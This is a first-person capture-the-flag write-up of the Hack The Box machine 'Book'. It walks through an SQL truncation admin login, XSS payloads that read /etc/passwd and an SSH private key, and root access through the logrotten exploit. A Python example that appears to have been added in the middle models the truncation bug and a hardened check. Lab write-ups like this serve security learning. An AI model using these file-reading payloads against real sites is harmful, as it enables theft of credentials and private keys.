BOOK — HTB Machine
A medium Linux machine is a great way to keep yourself busy on the weekend... let's get started by scanning the IP.
I used my personal script to scan the IP.
In the fast scan I got these two classic ports open.
Then I ran dirbuster to find the directories and map them, to narrow down the places to look at.
Let's sign up so we can log in on the page.
Greeted with the Library home page. I'll explore the functionalities available on this page.
payload.php was uploaded, but there is no way to find it: I tried to access docs, but my permissions are not enough, and I found no other place where the uploaded files are stored.
admin@book.htb is the admin e-mail, which can be useful.
An edit profile option is also present.
Couldn't find anything useful related to XSS, but only 10 characters are allowed for the username.
Since it is updating a value, there might be a way to connect this with database vulnerabilities, especially SQL-related ones.
After trying several times and reading a JavaScript note on the page, I found out that:
the name can be 10 characters long
the email can be 20 characters long
With the right number of trailing spaces, I used
admin@book.htb++++++
in place of admin@book.htb, giving me access to the page as the admin user!!
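To make the truncation bug from the defender's side concrete, here is an added Python example (not from the box or the original post) that emulates the two MySQL behaviours involved, silent truncation of over-long values in non-strict mode and PAD SPACE comparison that ignores trailing spaces, on an in-memory SQLite table, and puts a hardened sign-up check beside the vulnerable one. The 20-character column width is the page's (the `+` signs in the payload are URL-encoded spaces); the table and column names are assumptions.

```python
import sqlite3

EMAIL_MAX = 20  # width of the email column, as the page reports

def new_db():
    conn = sqlite3.connect(":memory:")  # assumed schema, admin pre-registered
    conn.execute("CREATE TABLE users (email TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES (?, ?)", ("admin@book.htb", "admin-secret"))
    return conn

# Two MySQL behaviours emulated here (SQLite itself does neither):
#  - non-strict mode silently truncates an over-long value on INSERT
#  - PAD SPACE collations ignore trailing spaces when comparing strings
def mysql_truncate(value):
    return value[:EMAIL_MAX]

def pad_space_equal(a, b):
    return a.rstrip(" ") == b.rstrip(" ")

def vulnerable_signup(conn, email, password):
    """Uniqueness check on the raw input, then an INSERT that truncates it."""
    for (existing,) in conn.execute("SELECT email FROM users"):
        if pad_space_equal(existing, email):
            return False  # "already registered"
    conn.execute("INSERT INTO users VALUES (?, ?)", (mysql_truncate(email), password))
    return True

def hardened_signup(conn, email, password):
    """Reject input that truncation or trimming would change, then check uniqueness."""
    if email != email.strip() or len(email) > EMAIL_MAX:
        return False
    for (existing,) in conn.execute("SELECT email FROM users"):
        if existing == email:
            return False
    conn.execute("INSERT INTO users VALUES (?, ?)", (email, password))
    return True

def login(conn, email, password):
    """Return the stored email the credentials matched, or None."""
    for existing, stored_pw in conn.execute("SELECT email, password FROM users"):
        if pad_space_equal(existing, email) and stored_pw == password:
            return existing
    return None

if __name__ == "__main__":
    padded = "admin@book.htb" + " " * 6 + "x"  # 21 chars, truncated to 20 on INSERT
    db = new_db()
    print(vulnerable_signup(db, padded, "pw"), login(db, "admin@book.htb", "pw"))
    print(hardened_signup(new_db(), padded, "pw"))
```

The vulnerable path stores a second row that compares equal to the admin's address, so the admin identity becomes usable with an attacker-chosen password; the hardened path refuses any address longer than the column or carrying leading/trailing whitespace before it ever reaches the database.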
I was still signed in as a user, so to get admin access I had to log in through the admin portal. Let's go.
While trying this it says "Nope", so let's get in via Burp.
999 tries later... we are finally in as admin.
Upon logging in and clicking on collection data we get this table, and with a little tweaking of the author name we can do this.
I used an img tag to send a request to my IP. Let's see if it works.
YESS it does...
Now let's try to exploit this to get something useful for a foothold on the machine.
Searching for JavaScript local file read and XSS local file read, I found this link helpful:
<script>
x = new XMLHttpRequest();
x.onload = function() { document.write(btoa(this.responseText)); };
x.open("GET", "file:///etc/passwd");
x.send();
</script>
With the script reading /etc/passwd, I got this.
Now that we have this we can go further and try to get a reverse shell if possible.
<script>
x = new XMLHttpRequest();
x.onload = function() {
    var content = this.responseText;
    var boxedContent = '<div style="border: 1px solid black; padding: 10px; margin: 10px; font-family: monospace; font-size: 12px; max-height: 400px; overflow: auto;"><pre>' + content + '</pre></div>';
    document.body.innerHTML = boxedContent;
};
x.open("GET", "file:///home/reader/.ssh/id_rsa");
x.send();
</script>
After rigorous trial and error I finally found code that shows me the id_rsa key properly.
Finally, the foothold.
With that, the user flag is submitted!!
To analyse the machine better I wget LINPEAS.SH onto the machine, and in the output I find this:
an access.log file in the reader/backups directory,
where we have write access!!
Coming to the checklist I find this... searching for a logrotten exploit redirects me to the logrotate exploit, hence here we go.
With an article's help I found pspy32, and using that I saw that logrotate is being run on log.cfg. There is a vulnerability related to this, and this version is also vulnerable to it, which might help me get a root shell on the box:
I transferred logrotten to the target machine and compiled it with gcc to get an executable,
and with the steps given in the README.md I'm hoping to get a root shell.
Let's execute.
Let's wait for some time to see if we get a callback or not...
OK, so I tried everything but it was not working, so it was time to get a little creative. I thought that if I cannot connect to the server, maybe there is some issue, then I should at least try to read it and save it some place safe.
So with this I changed payload.sh to
And after less than a minute I got the flag...
AND the task is completed, but if someone has connected successfully to the box recently then please share your thoughts about what could have gone wrong in connecting to the machine.
THANKS...
My Review:
A very interesting room on exploiting SQL truncation, but getting anything done on the root side is a hassle in itself... After trying many times to connect, in the end I had to take the high road and get creative about it. But it is indeed a learning lesson and I loved the machine 🎉🥳